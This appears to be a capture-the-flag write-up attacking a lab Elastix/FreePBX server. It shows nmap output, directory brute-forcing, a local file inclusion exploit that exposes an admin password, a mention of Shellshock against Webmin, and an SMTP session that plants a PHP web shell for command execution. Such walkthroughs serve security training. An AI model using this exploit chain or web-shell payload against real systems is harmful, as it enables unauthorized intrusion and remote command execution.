Abusing LFI - Abusing shellshock - Abusing SMTP via LFI
Scanning
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-26 23:45 EST
Nmap scan report for 10.10.10.7
Host is up (0.040s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) AUTH-RESP-CODE PIPELINING UIDL EXPIRE(NEVER) USER RESP-CODES STLS TOP APOP
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: IDLE MULTIAPPEND CATENATE IMAP4 MAILBOX-REFERRALS Completed SORT=MODSEQ ATOMIC UIDPLUS CONDSTORE X-NETSCAPE RIGHTS=kxte THREAD=REFERENCES URLAUTHA0001 UNSELECT RENAME ANNOTATEMORE ACL NO NAMESPACE IMAP4rev1 QUOTA OK THREAD=ORDEREDSUBJECT SORT ID STARTTLS CHILDREN BINARY LIST-SUBSCRIBED LITERAL+ LISTEXT
443/tcp open ssl/https?
|_ssl-date: 2019-12-27T05:50:49+00:00; +1h00m57s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: UnixHost script results:
|_clock-skew: 1h00m56sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 388.60 seconds
Port 443 Enumeration
In this case we have two web servers running on ports 443 and 10000
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.7/ -k
The directories leak the version of FreePBX (2.8.1.4) being used but not the Elastix version number. I also tried common and default credentials on all the login forms I found in the directories and didn’t get anywhere
searchsploit elastix
The local file inclusion and the RCE looks interesting !
Foothold - 1
searchsploit -m 37637.pl
Looking at the exploit, it seems that the LFI vulnerability is in the current_language parameter
# This is the default admin name used to allow an administrator to login to ARI bypassing all security.
# Change this to whatever you want, don't forget to change the ARI_ADMIN_PASSWORD as well
ARI_ADMIN_USERNAME=admin# This is the default admin password to allow an administrator to login to ARI bypassing all security.
# Change this to a secure password.
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
Let’s try to use the above credentials to SSH into the admin account
Webmin portal is vulnerable to ShellShock vuln, Intercept the request in Burp and send it to Repeater. Change the User Agent field to the following string
We can abuse the LFI vuln to exec our mail - /var/mail/asterisk
220 beep.example.com ESMTP Postfix
HELO nxg
250 nxg
VRFY asterisk
250 2.1.5
MAIL FROM: example@nxg.com
250 2.1.0 Ok
RCPT TO: example2@nxg.com
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 4227FE00C
QUIT
221 2.0.0 Bye
We can now append cmd and check for any command exec !
